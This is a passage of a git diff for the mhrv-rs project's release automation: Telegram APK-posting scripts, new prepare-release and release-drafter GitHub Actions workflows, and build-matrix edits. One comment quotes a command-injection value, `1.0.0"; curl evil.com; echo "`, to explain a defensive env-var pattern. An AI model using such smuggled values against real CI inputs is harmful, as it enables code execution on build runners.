+    main_chat_id = os.environ.get("MAIN_CHAT_ID", "").strip()
+    if main_chat_id and announce_msg_id is not None:
+        link = files_channel_post_link(chat_id, announce_msg_id)
+        # Optional channel-join links rendered alongside the cross-link.
+        # `FILES_CHANNEL_USERNAME` is the public-username form (clean
+        # `t.me/<name>` URL — clickable for everyone). `FILES_CHANNEL_INVITE`
+        # is the `t.me/+<hash>` invite link, the only join path for
+        # private channels. Either or both can be set; both render in
+        # the body as separate lines.
+        username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@")
+        username_link = f"https://t.me/{username}" if username else ""
+        invite_link = os.environ.get("FILES_CHANNEL_INVITE", "").strip()
+        print()
+        print(f"posting cross-link to main channel:")
+        print(f"  post link: {link}")
+        if username_link:
+            print(f"  channel username link: {username_link}")
+        if invite_link:
+            print(f"  channel invite link:   {invite_link}")
+        ok = post_main_channel_pointer(
+            bot_token,
+            main_chat_id,
+            link,
+            args.version,
+            args.hashtag,
+            channel_username_link=username_link,
+            channel_invite_link=invite_link,
+            english_notes_brief=english_brief,
+        )
+        if not ok:
+            failures += 1
+    elif main_chat_id and announce_msg_id is None:
+        print()
+        print(
+            "  !! MAIN_CHAT_ID is set but announcement message_id is None — "
+            "skipping cross-link (no anchor to point at).",
+            flush=True,
+        )
+        failures += 1
+    else:
+        print()
+        print("  MAIN_CHAT_ID not set, skipping cross-link", flush=True)
+
+    print()
+    if failures:
+        print(f"DONE with {failures} failure(s) out of {len(files)}", flush=True)
+        return 1
+    print(f"DONE — {len(files)} files posted successfully", flush=True)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/.github/scripts/telegram_release_notify.py b/.github/scripts/telegram_release_notify.py
deleted file mode 100755
index da04d8b8..00000000
--- a/.github/scripts/telegram_release_notify.py
+++ /dev/null
@@ -1,366 +0,0 @@
-#!/usr/bin/env python3
-"""
-Post a CI-built Android APK to the project Telegram channel on each
-release tag, followed by a reply-threaded changelog message with
-Persian + English bullets in <blockquote> blocks.
-
-Called from the `telegram:` job in `.github/workflows/release.yml`.
-Environment:
-    BOT_TOKEN   Telegram bot token (repo secret TELEGRAM_BOT_TOKEN)
-    CHAT_ID     Numeric chat id, e.g. -1002282061190 (repo secret
-                TELEGRAM_CHAT_ID)
-Arguments:
-    --apk        path to the APK file to upload
-    --version    bare version string, e.g. "1.1.0"
-    --repo       "owner/repo"
-    --changelog  path to docs/changelog/vX.Y.Z.md; split on a line
-                 that is exactly "---" — anything before is Persian,
-                 anything after is English. Missing file = only the
-                 APK is posted (no reply).
-
-Why Python over curl: curl's `-F name=value` multipart spec treats
-`<file` as "read from file" and `@file` as "upload file". Our HTML
-captions contain literal `<b>` tags, which triggers the file-read
-path and exits 26 "Failed to open/read local data". urllib has no
-such behavior.
-
-Telegram quirks we deliberately handle:
-  - Captions max out at 1024 chars, so the APK caption is short
-    (title + sha256 + repo + release URL) and the real changelog
-    goes in a reply-threaded message (sendMessage has no practical
-    length limit).
-  - sendDocument content-type defaults to application/octet-stream
-    for unknown extensions — we pass .apk with
-    application/vnd.android.package-archive so channel previews
-    label it as an Android package, not a generic file.
-"""
-import argparse
-import hashlib
-import http.client
-import json
-import os
-import re
-import ssl
-import sys
-import uuid
-from pathlib import Path
-
-
-def parse_changelog(path: str) -> tuple[str, str]:
-    """Return (persian_body, english_body). Blank strings if file missing."""
-    p = Path(path)
-    if not p.is_file():
-        return "", ""
-    body = p.read_text(encoding="utf-8")
-    # Strip a leading HTML comment block if present — the changelog
-    # template uses <!-- ... --> to document the format for editors;
-    # we don't want that echoed to Telegram.
-    body = re.sub(r"^\s*<!--.*?-->\s*", "", body, count=1, flags=re.S)
-    fa, sep, en = body.partition("\n---\n")
-    if not sep:
-        # No separator — treat everything as Persian (content-language
-        # is a project preference rather than a hard rule).
-        return body.strip(), ""
-    return fa.strip(), en.strip()
-
-
-# Telegram caption hard-cap is 1024 chars. The fixed parts of our caption
-# (title + SHA hash + two-link footer with their preambles) sum to roughly
-# 470 chars on a typical version string. That leaves ~550 chars for the
-# release-note section before we'd start losing the trailing release URL.
-# Keep the budget conservative so a long version string or a slightly
-# longer hash representation doesn't push us over.
-CAPTION_FA_NOTE_BUDGET = 500
-
-
-def _md_links_to_html(text: str) -> str:
-    """Convert `[label](url)` markdown links to `<a href="url">label</a>`.
-
-    Telegram's HTML parse mode renders `<a>` as clickable but treats
-    markdown verbatim, so an unconverted `[#160](https://…)` appears as
-    that literal string in the channel post — both ugly and wasteful of
-    caption budget. The HTML form is shorter visually (`#160` vs the
-    full URL), still clickable, and counts the same toward Telegram's
-    1024-char limit. Inline `code` (`backtick-quoted`) is also
-    translated to `<code>…</code>` since markdown backticks render
-    literally too.
-    """
-    text = re.sub(
-        r"\[([^\]]+)\]\(([^)]+)\)",
-        lambda m: f'<a href="{m.group(2)}">{m.group(1)}</a>',
-        text,
-    )
-    text = re.sub(r"`([^`\n]+)`", r"<code>\1</code>", text)
-    # Bold (**…**) is rare in our changelog but happens — convert to <b>.
-    text = re.sub(r"\*\*([^*\n]+)\*\*", r"<b>\1</b>", text)
-    return text
-
-
-def _extract_headlines(fa_section: str) -> str:
-    """For each `• …: …` bullet, keep the headline part and drop the
-    elaboration.
-
-    Our changelog convention writes each bullet as one of:
-      • headline: full explanation
-      • headline ([#NN](url)): full explanation
-      • headline (issue ref): full explanation
-
-    The headline is everything up to the `: ` (colon + space) that ends
-    the leading clause. Naively searching for the first `:` lands inside
-    `https:` URLs of the markdown link form — instead we search from the
-    end of the parenthesized-issue-ref (if any) for the first `: `, or
-    fall back to the first `: ` in the line.
-
-    Headlines stay on the FA caption; the explanation is preserved in
-    the docs/changelog/ file and (optionally) the reply-threaded message
-    posted via --with-changelog.
-
-    Returns a newline-joined string of `• <headline>` lines.
-    """
-    headlines: list[str] = []
-    for line in fa_section.splitlines():
-        if not line.startswith("• "):
-            continue
-        body = line[2:]  # drop "• "
-        # Prefer cutting at "): " — the close of the parenthesized ref
-        # followed by the convention colon + space. That's our actual
-        # bullet structure and avoids the false-positive `https:` cut.
-        cut_idx = body.find("): ")
-        if cut_idx > 0:
-            headline = body[: cut_idx + 1]  # keep the close paren
-        else:
-            # Fall back to ": " (colon + space) anywhere in the body.
-            # Adding the space requirement skips `https:` which is
-            # always followed by `/`.
-            cut_idx = body.find(": ")
-            headline = body[:cut_idx] if cut_idx > 0 else body
-        headlines.append(f"• {headline.rstrip()}")
-    return "\n".join(headlines)
-
-
-def build_caption_release_note(changelog_path: str) -> str:
-    """Build the Persian "what's new" block for the Telegram caption.
-
-    Pulls the FA section of `docs/changelog/v<ver>.md`, extracts just
-    the bullet headlines (before the first `:` of each bullet) so the
-    note is compact, converts markdown links/code to Telegram HTML for
-    clickability, and wraps in a `<blockquote>`. Falls back to the full
-    FA section if the headlines extraction yields nothing (e.g. a
-    changelog that doesn't follow our `• headline: details` convention).
-
-    If the result still exceeds CAPTION_FA_NOTE_BUDGET, truncate at a
-    bullet boundary with a trailing `…`. In practice the headlines-only
-    form fits comfortably for any reasonable release note.
-    """
-    fa, _en = parse_changelog(changelog_path)
-    if not fa:
-        return ""
-    headlines = _extract_headlines(fa)
-    note = headlines if headlines else fa.strip()
-    note = _md_links_to_html(note)
-    if len(note) > CAPTION_FA_NOTE_BUDGET:
-        truncated = note[:CAPTION_FA_NOTE_BUDGET]
-        last_bullet = truncated.rfind("\n•")
-        if last_bullet > 0:
-            note = truncated[:last_bullet].rstrip() + "\n…"
-        else:
-            note = truncated.rstrip() + "…"
-    return f"<blockquote>{note}</blockquote>"
-
-
-def sha256_of(path: str) -> str:
-    h = hashlib.sha256()
-    with open(path, "rb") as f:
-        for chunk in iter(lambda: f.read(1024 * 1024), b""):
-            h.update(chunk)
-    return h.hexdigest()
-
-
-def tg_request(method: str, token: str, *, body: bytes, content_type: str) -> dict:
-    """POST `body` to https://api.telegram.org/bot<token>/<method>."""
-    conn = http.client.HTTPSConnection(
-        "api.telegram.org", context=ssl.create_default_context()
-    )
-    conn.request(
-        "POST",
-        f"/bot{token}/{method}",
-        body=body,
-        headers={"Content-Type": content_type, "Content-Length": str(len(body))},
-    )
-    resp = conn.getresponse()
-    raw = resp.read()
-    try:
-        data = json.loads(raw)
-    except json.JSONDecodeError:
-        raise SystemExit(f"Telegram {method}: non-JSON response ({resp.status}): {raw!r}")
-    if not data.get("ok"):
-        raise SystemExit(f"Telegram {method} failed: {data}")
-    return data["result"]
-
-
-def send_document(token: str, chat_id: str, apk_path: str, caption: str) -> int:
-    """Upload the APK file with a short HTML caption. Returns message_id."""
-    boundary = "----" + uuid.uuid4().hex
-    with open(apk_path, "rb") as f:
-        file_bytes = f.read()
-
-    def text_field(name: str, value: str) -> bytes:
-        return (
-            f"--{boundary}\r\n"
-            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
-            f"{value}\r\n"
-        ).encode("utf-8")
-
-    def file_field(name: str, filename: str, content: bytes) -> bytes:
-        head = (
-            f"--{boundary}\r\n"
-            f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
-            # Proper MIME type — makes the Telegram client show the APK
-            # with the Android package icon and honour its size/name.
-            f"Content-Type: application/vnd.android.package-archive\r\n\r\n"
-        ).encode("utf-8")
-        return head + content + b"\r\n"
-
-    body = (
-        text_field("chat_id", chat_id)
-        + text_field("caption", caption)
-        + text_field("parse_mode", "HTML")
-        + file_field("document", os.path.basename(apk_path), file_bytes)
-        + f"--{boundary}--\r\n".encode("utf-8")
-    )
-
-    result = tg_request(
-        "sendDocument",
-        token,
-        body=body,
-        content_type=f"multipart/form-data; boundary={boundary}",
-    )
-    return int(result["message_id"])
-
-
-def send_reply(token: str, chat_id: str, text: str, reply_to: int) -> None:
-    """Post a text message as a reply to the APK message."""
-    from urllib.parse import urlencode
-
-    body = urlencode(
-        {
-            "chat_id": chat_id,
-            "text": text,
-            "parse_mode": "HTML",
-            "reply_to_message_id": str(reply_to),
-        }
-    ).encode()
-    tg_request(
-        "sendMessage",
-        token,
-        body=body,
-        content_type="application/x-www-form-urlencoded",
-    )
-
-
-def main() -> int:
-    ap = argparse.ArgumentParser()
-    ap.add_argument("--apk", required=True)
-    ap.add_argument("--version", required=True)
-    ap.add_argument("--repo", required=True)
-    ap.add_argument("--changelog", required=True,
-                    help="Path to docs/changelog/vX.Y.Z.md; only read when --with-changelog is passed.")
-    # Default: just the APK + short caption (title + SHA-256 + repo URL +
-    # release URL). The per-release Persian/English blockquote reply is
-    # opt-in via `--with-changelog` so routine releases don't flood the
-    # channel with bullet-point bodies. To re-enable for a specific tag:
-    # set the repo variable TELEGRAM_INCLUDE_CHANGELOG=true before pushing
-    # the tag (the workflow converts that into --with-changelog).
-    ap.add_argument("--with-changelog", action="store_true",
-                    help="Include the Persian+English changelog as a reply-threaded message.")
-    # Dry-run lets you verify the rendered caption locally without hitting
-    # Telegram. Useful when changing the brief-release-note budget /
-    # truncation logic — print, eyeball, push.
-    ap.add_argument("--dry-run", action="store_true",
-                    help="Render the caption and print it instead of posting. "
-                         "Skips token/chat_id checks.")
-    args = ap.parse_args()
-
-    if not args.dry_run:
-        token = os.environ.get("BOT_TOKEN", "")
-        chat_id = os.environ.get("CHAT_ID", "")
-        if not token or not chat_id:
-            print("TELEGRAM secrets not present, skipping post.")
-            return 0
-    else:
-        token = ""
-        chat_id = ""
-
-    ver = args.version
-    sha = sha256_of(args.apk)
-    # Brief Persian release-note above the links. Pulled from the FA
-    # half of `docs/changelog/v<ver>.md` so each release auto-includes
-    # what's new without manual edits to this script. Truncated to fit
-    # Telegram's 1024-char caption budget alongside title + SHA + the
-    # two-link footer.
-    fa_note = build_caption_release_note(args.changelog)
-
-    # Caption structure requested by the repo owner:
-    #   1. Title + SHA-256 (as before)
-    #   2. Brief Persian "what's new" note (extracted from changelog)
-    #   3. Persian preamble labelling the repo link as
-    #      "GitHub repo + full Persian guide"
-    #   4. Repo URL
-    #   5. Persian preamble labelling the release link as
-    #      "this version's release — desktop/router builds live here"
-    #   6. Release URL
-    # Keeps total well under Telegram's 1024-char caption limit.
-    caption_parts = [
-        f"<b>mhrv-rs Android v{ver}</b>",
-        "",
-        f"SHA-256: <code>{sha}</code>",
-    ]
-    if fa_note:
-        caption_parts.extend(["", fa_note])
-    caption_parts.extend([
-        "",
-        "مخزن گیتهاب  + مطالعه راهنمای کامل فارسی:",
-        f"https://github.com/{args.repo}",
-        "",
-        "لینک به این نسخه جهت دریافت نسخه های مربوط به مودم و کامپیوتر:",
-        f"https://github.com/{args.repo}/releases/tag/v{ver}",
-    ])
-    caption = "\n".join(caption_parts)
-
-    if args.dry_run:
-        print(f"--- DRY RUN: caption ({len(caption)} chars) ---")
-        print(caption)
-        print(f"--- END DRY RUN ---")
-        if args.with_changelog:
-            fa, en = parse_changelog(args.changelog)
-            print(f"\nWould reply with changelog "
-                  f"(fa: {len(fa) if fa else 0} chars, "
-                  f"en: {len(en) if en else 0} chars)")
-        return 0
-
-    doc_mid = send_document(token, chat_id, args.apk, caption)
-    print(f"sendDocument OK, message_id={doc_mid}")
-
-    if not args.with_changelog:
-        print("Changelog reply disabled (default). Pass --with-changelog to include.")
-        return 0
-
-    fa, en = parse_changelog(args.changelog)
-    if not fa and not en:
-        print(f"No changelog at {args.changelog}, skipping reply.")
-        return 0
-
-    parts = []
-    if fa:
-        parts.append(f"<blockquote>{fa}</blockquote>")
-    if en:
-        parts.append(f"<blockquote>{en}</blockquote>")
-    reply = "\n\n".join(parts)
-
-    send_reply(token, chat_id, reply, doc_mid)
-    print("Reply OK")
-    return 0
-
-
-if __name__ == "__main__":
-    sys.exit(main())
diff --git a/.github/workflows/prepare-release.yml b/.github/workflows/prepare-release.yml
new file mode 100644
index 00000000..2eb83720
--- /dev/null
+++ b/.github/workflows/prepare-release.yml
@@ -0,0 +1,296 @@
+# Prepare a new release: bump version strings, prefill the changelog
+# stub from release-drafter's draft, and open a PR. After the PR is
+# merged, you push the `v<version>` tag manually and `release.yml`
+# takes over (matrix build → GitHub release → Telegram notify).
+#
+# Triggered manually from the Actions UI or via:
+#   gh workflow run prepare-release.yml -f version=1.6.6
+#
+# What it bumps in the PR:
+#   - Cargo.toml                        version = "X.Y.Z"
+#   - Cargo.lock                        mhrv-rs entry's version
+#   - android/app/build.gradle.kts      versionName = "X.Y.Z"
+#                                       versionCode = previous + 1
+#
+# What it leaves alone:
+#   - tunnel-node/Cargo.toml — versioned independently from the app.
+#     The docker tunnel image is tagged from the git release tag (not
+#     from this Cargo.toml), so we don't need to touch it.
+#
+# What it prefills in docs/changelog/v<version>.md:
+#   - Persian section: an inline `[FA] translate ...` placeholder line.
+#     Visible if not edited — ships into the release page as an obvious
+#     marker rather than a quiet comment leak.
+#   - Separator: `---`
+#   - English section: bullets pulled from release-drafter's `next`
+#     draft release, each suffixed with `: <expand>` to remind you to
+#     add an explanatory clause in the project's existing
+#     `• headline (#NN): full explanation` style. If no draft exists
+#     yet (e.g. immediately after installing release-drafter, before
+#     any PRs have merged), the English section is empty and you fill
+#     it in by hand.
+
+name: prepare-release
+
+on:
+  workflow_dispatch:
+    inputs:
+      version:
+        description: 'New version to release (without the leading v). Example: 1.6.6'
+        required: true
+        type: string
+
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  bump:
+    runs-on: ubuntu-latest
+    steps:
+      # Always check out main, regardless of which branch the dispatch
+      # was fired from. workflow_dispatch can be triggered from any ref;
+      # without an explicit `ref:` the version bumps would land on top
+      # of whatever branch the dispatcher had checked out, and the
+      # resulting PR would carry that branch's diffs alongside the bumps.
+      - uses: actions/checkout@v4
+        with:
+          ref: main
+          fetch-depth: 0  # need tag history for the duplicate-tag check below
+
+      - name: Validate version
+        id: ver
+        env:
+          # Pass the dispatch input through an env var rather than
+          # `${{ inputs.version }}` interpolation. GitHub interpolates
+          # the expression *before* the shell parses the script, so a
+          # value like `1.0.0"; curl evil.com; echo "` would execute
+          # before the regex check below ever ran. workflow_dispatch
+          # is gated to write-access users so practical risk is low,
+          # but this is the pattern GitHub's own docs recommend for
+          # defense in depth.
+          INPUT_VERSION: ${{ inputs.version }}
+        run: |
+          set -euo pipefail
+          VER="$INPUT_VERSION"
+          VER="${VER#v}"
+          if ! [[ "$VER" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+            echo "::error::version '$VER' is not in X.Y.Z format"
+            exit 1
+          fi
+          if git rev-parse "v${VER}" >/dev/null 2>&1; then
+            echo "::error::tag v${VER} already exists; pick a different version"
+            exit 1
+          fi
+          BRANCH="release/v${VER}"
+          if git ls-remote --exit-code --heads origin "$BRANCH" >/dev/null 2>&1; then
+            echo "::error::branch $BRANCH already exists on origin; delete it or pick a different version"
+            exit 1
+          fi
+          echo "version=${VER}" >> "$GITHUB_OUTPUT"
+          echo "branch=${BRANCH}" >> "$GITHUB_OUTPUT"
+
+      - name: Bump Cargo.toml + Cargo.lock
+        env:
+          NEW_VER: ${{ steps.ver.outputs.version }}
+        run: |
+          set -euo pipefail
+          # Edit both files via Python, anchored on the `name = "mhrv-rs"` line so
+          # only the package's own version changes. Check the match count, not the
+          # text diff, so an already-bumped file isn't reported as "not found".
+          python3 <<'PY'
+          import os, re, pathlib, sys
+          ver = os.environ["NEW_VER"]
+          for path in ("Cargo.toml", "Cargo.lock"):
+              p = pathlib.Path(path)
+              src = p.read_text()
+              new, n = re.subn(
+                  r'(name = "mhrv-rs"\nversion = ")[0-9.]+(")',
+                  rf'\g<1>{ver}\g<2>',
+                  src,
+                  count=1,
+              )
+              if n == 0:
+                  sys.exit(f"ERROR: mhrv-rs version line not found in {path}")
+              p.write_text(new)
+              print(f"{path} -> {ver}")
+          PY
+
+      - name: Bump android versionName + versionCode
+        env:
+          NEW_VER: ${{ steps.ver.outputs.version }}
+        run: |
+          set -euo pipefail
+          # versionCode increments by 1 on every release; versionName mirrors
+          # the Cargo version. Both live in android/app/build.gradle.kts.
+          python3 <<'PY'
+          import os, re, pathlib, sys
+          ver = os.environ["NEW_VER"]
+          p = pathlib.Path("android/app/build.gradle.kts")
+          src = p.read_text()
+          m = re.search(r'versionCode\s*=\s*(\d+)', src)
+          if not m:
+              sys.exit("ERROR: versionCode not found in build.gradle.kts")
+          old_code = int(m.group(1))
+          new_code = old_code + 1
+          src = src[:m.start(1)] + str(new_code) + src[m.end(1):]
+          src, n = re.subn(
+              r'versionName\s*=\s*"[^"]+"',
+              f'versionName = "{ver}"',
+              src,
+              count=1,
+          )
+          if n == 0:
+              sys.exit("ERROR: versionName not found in build.gradle.kts")
+          p.write_text(src)
+          print(f"android/app/build.gradle.kts -> versionName={ver}, versionCode={old_code}->{new_code}")
+          PY
+
+      - name: Fetch release-drafter draft body
+        id: draft
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          # release-drafter accumulates merged-PR titles into a draft tagged
+          # `next`. Pull its body for the changelog stub. `--repo` is set
+          # explicitly so we always look up the release in this repo even
+          # if a future maintainer ever creates a real `next` git tag in a
+          # fork or upstream. If no draft exists yet (release-drafter just
+          # installed, no PRs merged since), the `|| true` keeps us going
+          # with an empty body — you fill the English section by hand.
+          # `--jq 'select(.isDraft) | .body'` returns nothing if `next` is
+          # not a draft (i.e. someone manually published a release with
+          # tag `next`, or pushed a real `next` git tag with a release
+          # attached). On that path we treat it as "no draft" and fall
+          # through to the empty-body branch — better than echoing a
+          # surprise release body into the changelog stub.
+          BODY=$(gh release view next --repo "$GITHUB_REPOSITORY" \
+                   --json body,isDraft --jq 'select(.isDraft) | .body' 2>/dev/null || true)
+          if [ -z "$BODY" ]; then
+            echo "::notice::no release-drafter 'next' draft found; English section will be empty"
+          else
+            echo "::notice::pulled $(printf '%s\n' "$BODY" | wc -l) lines from draft release"
+          fi
+          # Multiline outputs need a heredoc-style delimiter — pick one that
+          # cannot appear in a release-drafter bullet line.
+          {
+            echo 'body<<__DRAFT_BODY_EOF__'
+            printf '%s\n' "$BODY"
+            echo '__DRAFT_BODY_EOF__'
+          } >> "$GITHUB_OUTPUT"
+
+      - name: Write changelog stub
+        env:
+          NEW_VER: ${{ steps.ver.outputs.version }}
+          DRAFT_BODY: ${{ steps.draft.outputs.body }}
+        run: |
+          set -euo pipefail
+          # Build the file with shell `echo`/`printf` (not a YAML-level
+          # heredoc with $-double-curly interpolation) so backticks, dollar
+          # signs, or EOF tokens in the draft body can't break us.
+          #
+          # Why no TODO/instructional <!-- comments -->:
+          # release.yml strips leading <!-- comment --> blocks from the
+          # file before publishing the GitHub Release body, and the
+          # Telegram script does the same — both via a regex that handles
+          # multiple consecutive comments. But relying on stripping is
+          # brittle: a maintainer adding a new comment with a different
+          # shape (multi-line, indented, etc.) could leak it. Instead we
+          # use VISIBLE placeholders below. If the maintainer forgets to
+          # edit them, they ship as obvious `[FA]`/`<expand>` markers
+          # that an admin will spot in the release page within seconds.
+          mkdir -p docs/changelog
+          OUT="docs/changelog/v${NEW_VER}.md"
+          {
+            echo '<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->'
+            echo '[FA] translate the English bullets below into Persian and replace this line.'
+            echo ''
+            echo '---'
+            # Append the English section if release-drafter had any.
+            # Skip the printf entirely on empty so we don't leave a
+            # trailing blank line under `---`.
+            if [ -n "$DRAFT_BODY" ]; then
+              # Strip Conventional-Commit prefixes (`feat:`, `fix(android):`,
+              # etc.) from the start of each bullet headline. PR titles in
+              # this repo all carry these prefixes by convention, but the
+              # existing changelog style is verb-first ("Add X" / "Fix Y"),
+              # not type-first. Stripping here saves the maintainer one
+              # manual step per bullet; they still need to fix the verb
+              # tense (e.g. "added" → "Add") since GitHub PR titles tend
+              # to be past-tense and the changelog convention is imperative.
+              #
+              # Bullet shape from release-drafter is:
+              #   • feat(scope): title text ([#NN](url)): <expand>. Thanks @user
+              # After this sed:
+              #   • title text ([#NN](url)): <expand>. Thanks @user
+              printf '%s\n' "$DRAFT_BODY" \
+                | sed -E 's/^(• )(feat|fix|chore|docs?|refactor|perf|test|build|ci|style|revert)(\([^)]*\))?!?: */\1/i'
+            fi
+          } > "$OUT"
+          echo "wrote $OUT ($(wc -l < "$OUT") lines)"
+
+      # No `Ensure release-prep label exists` step here — release-drafter's
+      # workflow runs on every push to main, and its `Ensure autolabeler
+      # labels exist` step creates `release-prep` (along with the type:*
+      # labels). Since these workflow files only land via a push to main,
+      # release-drafter's bootstrap necessarily runs before the first
+      # prepare-release dispatch. If for some reason release-drafter is
+      # disabled, `gh pr create --label release-prep` below will fail with
+      # an actionable "label not found" — fix is to re-enable
+      # release-drafter or run `gh label create release-prep` once by hand.
+
+      - name: Commit, push, and open PR
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          NEW_VER: ${{ steps.ver.outputs.version }}
+          BRANCH: ${{ steps.ver.outputs.branch }}
+        run: |
+          set -euo pipefail
+          git config user.name "github-actions[bot]"
+          git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
+          git checkout -b "$BRANCH"
+          git add Cargo.toml Cargo.lock android/app/build.gradle.kts \
+                  "docs/changelog/v${NEW_VER}.md"
+          git commit -m "release: prepare v${NEW_VER}"
+          git push -u origin "$BRANCH"
+
+          # Write the PR body to a file rather than fight nested heredoc
+          # escaping in the YAML run: block.
+          #
+          # IMPORTANT: this heredoc terminator (`MSG`) is INTENTIONALLY
+          # unquoted so that ${NEW_VER} and ${BRANCH} expand. Backticks
+          # in the body are escaped (\`) for the same reason. If you
+          # paste anything into the template below, watch out for `$(...)`
+          # and unescaped backticks — they will execute at workflow run
+          # time. To add a static block that should NOT interpolate, build
+          # it with a separate `<<'STATIC'` heredoc and concat afterward.
+          cat > /tmp/pr-body.md <<MSG
+          Automated version bump for **v${NEW_VER}**.
+
+          Bumped in this PR:
+          - \`Cargo.toml\` and \`Cargo.lock\` → ${NEW_VER}
+          - \`android/app/build.gradle.kts\` → versionName=${NEW_VER}, versionCode incremented by 1
+          - \`docs/changelog/v${NEW_VER}.md\` stubbed; English bullets prefilled from release-drafter's \`next\` draft
+
+          **Before merging — finish the changelog on this branch:**
+          1. Check out this branch locally: \`git fetch && git checkout ${BRANCH}\`
+          2. In \`docs/changelog/v${NEW_VER}.md\`:
+             - **Persian section:** replace the \`[FA] translate ...\` line with the Persian bullets above the \`---\` separator.
+             - **English section:** for each bullet, (a) fix the verb tense if needed (release-drafter passes through PR titles as-is, so "added" → "Add", "fixed" → "Fix"), and (b) replace \`<expand>\` with a short explanatory clause matching the project's \`• headline (#NN): full explanation\` style. The Conventional-Commit prefix (\`feat:\`/\`fix:\`/etc.) and the trailing \`. Thanks @author\` are already handled.
+          3. Commit + push to this branch so the PR includes the final bilingual changelog.
+
+          Any \`[FA]\` or \`<expand>\` markers left in the file will ship verbatim into the GitHub Release page and the Telegram post — they're intentionally visible, not hidden in HTML comments.
+
+          **After merging — ship it:**
+          1. \`git checkout main && git pull\`
+          2. \`git tag v${NEW_VER} && git push origin v${NEW_VER}\`
+          3. \`release.yml\` picks up the tag, builds artifacts, creates the GitHub release, and (if enabled) posts to Telegram.
+          MSG
+
+          gh pr create \
+            --base main \
+            --head "$BRANCH" \
+            --title "release: prepare v${NEW_VER}" \
+            --label "release-prep" \
+            --body-file /tmp/pr-body.md
diff --git a/.github/workflows/release-drafter.yml b/.github/workflows/release-drafter.yml
new file mode 100644
index 00000000..60e86445
--- /dev/null
+++ b/.github/workflows/release-drafter.yml
@@ -0,0 +1,65 @@
+# Updates the draft GitHub release on every push to main, and applies
+# Conventional-Commit-derived labels to incoming PRs. Config lives in
+# `.github/release-drafter.yml`. The drafter writes one line per merged
+# PR into a draft release tagged `next`; `prepare-release.yml` reads
+# that body when bumping versions so the English half of
+# `docs/changelog/v<ver>.md` is prefilled.
+#
+# Cost: one ubuntu-latest job per relevant PR/push event, a handful of
+# API calls (label bootstrap + the drafter action), no compile, no tests.
+# Zero contention with the self-hosted Hetzner runners that release.yml uses.
+
+name: release-drafter
+
+on:
+  push:
+    branches: [main]
+  # `pull_request_target` runs in the context of the base branch (main),
+  # which is what the autolabeler needs to write labels back to PRs —
+  # including PRs from forks, which the regular `pull_request` event
+  # doesn't grant write permissions for. We never check out PR code
+  # in this workflow (only call the action), so the elevated context
+  # is safe.
+  pull_request_target:
+    types: [opened, reopened, synchronize, edited]
+
+permissions:
+  contents: read
+
+jobs:
+  update-draft:
+    permissions:
+      contents: write       # write the draft release object
+      pull-requests: write  # apply autolabeler labels to incoming PRs
+    runs-on: ubuntu-latest
+    steps:
+      # Ensure the labels referenced by .github/release-drafter.yml's
+      # autolabeler block all exist. release-drafter logs a warning and
+      # skips when it tries to apply a label that's missing — labelling
+      # itself doesn't fail, but exclude-labels and downstream filtering
+      # become silent no-ops. `gh label create … || true` is idempotent:
+      # creates on first run, exits with "already exists" on every run
+      # after that. Cheap (6 API calls per workflow run — one per label — no compile).
+      - name: Ensure autolabeler labels exist
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          # Format: name|color|description (color without leading #).
+          while IFS='|' read -r name color desc; do
+            gh label create "$name" --color "$color" --description "$desc" \
+              --repo "${{ github.repository }}" 2>/dev/null || true
+          done <<'LABELS'
+          release-prep|ededed|Automated version-bump PR; excluded from release-drafter changelog
+          type: feature|a2eeef|feat: PR — auto-applied by release-drafter
+          type: fix|d73a4a|fix: PR — auto-applied by release-drafter
+          type: chore|cfd3d7|chore: PR — auto-applied by release-drafter
+          type: docs|0075ca|docs: PR — auto-applied by release-drafter
+          type: refactor|fbca04|refactor: PR — auto-applied by release-drafter
+          LABELS
+
+      - uses: release-drafter/release-drafter@v6
+        with:
+          config-name: release-drafter.yml
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 55caa258..51630c81 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -77,6 +77,17 @@ jobs:
           - target: x86_64-pc-windows-gnu
             os: windows-latest
             name: mhrv-rs-windows-amd64
+          # i686-pc-windows-msvc target was attempted in v1.7.7-v1.7.10
+          # to support Windows 7 32-bit users (#272, #318). Removed in
+          # v1.7.11 because keeping it on Rust 1.77.2 (last Win7-stable)
+          # is fundamentally fragile: every transitive crate that bumps
+          # its MSRV (e.g. `time` 0.3.47 needs Cargo manifest features
+          # only available in Rust 1.78+) breaks the build, and pinning
+          # transitives is brittle across releases. Win7 users should
+          # self-build per the README; the project no longer ships a
+          # prebuilt i686 Win7 binary. Replaced by the existing
+          # x86_64-pc-windows-gnu (windows-amd64) which covers ~99% of
+          # active Windows installs (incl. all WoA64 emulation).
           - target: x86_64-unknown-linux-musl
             os: [self-hosted, linux, x64, mhrv-build]
             name: mhrv-rs-linux-musl-amd64
@@ -138,9 +149,14 @@ jobs:
       # installed and the standard target triples are pre-added. It
       # still verifies the target is present and is cheap enough to keep
       # as a safety net.
-      - uses: dtolnay/rust-toolchain@stable
+      # Per-matrix-entry toolchain selection. Default is `stable` (latest)
+      # for every target unless its matrix entry sets `rust_toolchain`. The
+      # pin was introduced for i686-pc-windows-msvc on 1.77.2 (Win7-loadable;
+      # Rust 1.78+ requires Win10); that target was removed in v1.7.11.
+      - uses: dtolnay/rust-toolchain@master
         if: matrix.mipsel_softfloat != true
         with:
+          toolchain: ${{ matrix.rust_toolchain || 'stable' }}
           targets: ${{ matrix.target }}
 
       # Cache target/ + cargo registry across runs — this is the big
@@ -159,7 +175,11 @@ jobs:
       - uses: Swatinem/rust-cache@v2
         if: matrix.mipsel_softfloat != true
         with:
-          key: ${{ matrix.target }}
+          # Include toolchain in the cache key so a pinned-Rust target
